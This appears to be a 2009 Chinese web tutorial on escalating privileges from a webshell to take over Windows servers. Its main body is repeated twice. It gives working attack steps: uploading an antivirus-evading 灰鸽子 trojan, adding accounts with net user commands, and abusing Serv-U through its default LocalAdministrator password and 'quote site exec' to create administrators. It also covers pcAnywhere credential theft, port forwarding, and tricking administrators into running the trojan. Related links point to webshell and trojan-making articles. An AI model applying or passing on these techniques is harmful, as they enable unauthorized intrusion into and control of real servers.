webshell 提权方法 服务器提权教程
发布时间:2009-09-30 00:30:02 作者:佚名 
我要评论
我要评论提高入侵网站服务器的成功率,从事网络安全的朋友可以参考下,如果防范。
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
一:首先检测一下网站的服务器是否开了 3389
远程终端
二:检测一下服务是否用了serv-u (还有是什么版本的)
方法
一:复制一个网站 用 3389 登陆器连接一下 (是否成功)
能连接了,拿下服务器的机率,提高 30%了
二:用ftp模式查下一个服务器的版本
开始 -- 运行 -- cmd -- ftp (加你要登陆的网站)
---------------------------------------------------------------------------------------
第一步:最简单的方法
看有没有权限,能不能执行命令,行的话直接传个鸽子运行(成功率非常低)
----------------------------------------------------------------------------------------
第二步::寻找有执行的权限目录
c:\winnt\system32\inetsrv\data\
c:\Documents and Settings\All Users\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
这样的目录可以直接上传鸽子,运行
-----------------------------------------------------------------------------------
第三步:传个cmd和开帐号的ftp.exe上去直接加帐号
命令就是你上传目录D:\VMware Workstation\cmd.exe "net user xiao xiao
/add"
-----------------------------------------------------------------------------------
第四步:asp提权木马直接提权
serv-u 6.3 版本 好象用asp提权木马(不成功)
serv-u 6.2 版本 好象可以
不过提权能不能用asp木马还要看服务器,设置的变态不
假设直接用asp提权成功之后,还是不成功,但是可以在
cmd之下 用这个帐号连接一下
ftp (加你提权的网站)
帐号:LocalAdministrator 密码:$ak#.1k;0@p">#1@$ak#.1k;0@p
如果成功连接后就可以直接添加管理员帐号了
命令:quote site exec (你添加的帐号) net user 123 123 /ad
quote site exec (把帐号提升到最高权限) net localgroup administartors
123 /add
---------------------------------------------------------------------------------------
第五步:pcaanywhere
C:\Documents and Settings\All Users\Application
Data\Symantec\pcAnywhere\
这里下他的GIF文件,在本地安装pcanywhere上去
网上很多教程
---------------------------------------------------------------------------------------
第六步:serv-u覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini
网上很多教程
----------------------------------------------------------------------------------------
第七步:Serv-U转发端口
给Latte加盐 曾经做个一个(serv-u经典提权全套教程)用到过这个方法,可以学习一下
上传个端口转发工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,
IP填对方IP,帐号为LocalAdministrator
密码为$ak#.1k;0@p">#1@$ak#.1k;0@p,
连接上后你就可以管理他的Serv-u了
--------------------------------------------------------------------------------------------
第八步:社会工程学之提升提权
把灰鸽子传到上面,然后转移到c盘,就等着管理员运行了,前提你的鸽子必须免杀
要是让我看到一个不清楚的exe程序,老想点开看看,呵呵(估计没有那个SB会点吧)
远程终端
二:检测一下服务是否用了serv-u (还有是什么版本的)
方法
一:复制一个网站 用 3389 登陆器连接一下 (是否成功)
能连接了,拿下服务器的机率,提高 30%了
二:用ftp模式查下一个服务器的版本
开始 -- 运行 -- cmd -- ftp (加你要登陆的网站)
---------------------------------------------------------------------------------------
第一步:最简单的方法
看有没有权限,能不能执行命令,行的话直接传个鸽子运行(成功率非常低)
----------------------------------------------------------------------------------------
第二步::寻找有执行的权限目录
c:\winnt\system32\inetsrv\data\
c:\Documents and Settings\All Users\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
这样的目录可以直接上传鸽子,运行
-----------------------------------------------------------------------------------
第三步:传个cmd和开帐号的ftp.exe上去直接加帐号
命令就是你上传目录D:\VMware Workstation\cmd.exe "net user xiao xiao
/add"
-----------------------------------------------------------------------------------
第四步:asp提权木马直接提权
serv-u 6.3 版本 好象用asp提权木马(不成功)
serv-u 6.2 版本 好象可以
不过提权能不能用asp木马还要看服务器,设置的变态不
假设直接用asp提权成功之后,还是不成功,但是可以在
cmd之下 用这个帐号连接一下
ftp (加你提权的网站)
帐号:LocalAdministrator 密码:$ak#.1k;0@p">#1@$ak#.1k;0@p
如果成功连接后就可以直接添加管理员帐号了
命令:quote site exec (你添加的帐号) net user 123 123 /ad
quote site exec (把帐号提升到最高权限) net localgroup administartors
123 /add
---------------------------------------------------------------------------------------
第五步:pcaanywhere
C:\Documents and Settings\All Users\Application
Data\Symantec\pcAnywhere\
这里下他的GIF文件,在本地安装pcanywhere上去
网上很多教程
---------------------------------------------------------------------------------------
第六步:serv-u覆盖提权
本地安装个su,将你自己的ServUDaemon.ini文件用从他那下载下来的ServUDaemon.ini
网上很多教程
----------------------------------------------------------------------------------------
第七步:Serv-U转发端口
给Latte加盐 曾经做个一个(serv-u经典提权全套教程)用到过这个方法,可以学习一下
上传个端口转发工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是将3333端口映射到43958端口上。 然后就可以在本地安装一个Serv-u,新建一个服务器,
IP填对方IP,帐号为LocalAdministrator
密码为$ak#.1k;0@p">#1@$ak#.1k;0@p,
连接上后你就可以管理他的Serv-u了
--------------------------------------------------------------------------------------------
第八步:社会工程学之提升提权
把灰鸽子传到上面,然后转移到c盘,就等着管理员运行了,前提你的鸽子必须免杀
要是让我看到一个不清楚的exe程序,老想点开看看,呵呵(估计没有那个SB会点吧)
相关文章
- 这篇文章主要为大家分享一下当qq被盗时的找回密码的方法需要的朋友可以参考一下,尽量到官方网站操作2015-05-12
- 通过几次成功的拿Webshell,发现自己有时也走了一些弯路,为了避免其他的朋友再在困惑中迷失方向,现在我将自己的一些经验写出来,希望对一些想学拿Webshell的朋友有一定的2008-10-08
- 大家是不是拿到了很多webshell.... 但 无法提权....2009-09-30
- 这篇文章主要介绍了整人用的一个邪恶电脑重启病毒,本文用bat文件伪造如QQ图标等常用软件,导致点击就会重启的恶作剧脚本,需要的朋友可以参考下2014-10-10
- 1.名称:如何制作图片ASP木马 (可显示图片) 建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 找一个正常图片ating.jpg,插入一句话木2008-10-08
- FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFol2009-04-20
- 美国一家密码管理应用提供商SplashData 公司近期总结出2012年度最差的25个密码,美国《纽约时报》作家尼克尔·佩尔荣斯近日撰文指出,密码要想不被黑客猜中,有几点非2012-11-13
伪黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介绍(图)
黑客必须要有专业的知识,丰富的经验。而伪黑客不需要,只需要几个工具,扫描默认口令、弱口令、漏洞,就能利用。2012-05-18- 大家都知道服务器的攻击有很多种,但是有三种主流的攻击,那就是DoS攻击、CC攻击以及ARP欺骗,下面小编就为大家具体的讲解这三种攻击2016-10-20
最新评论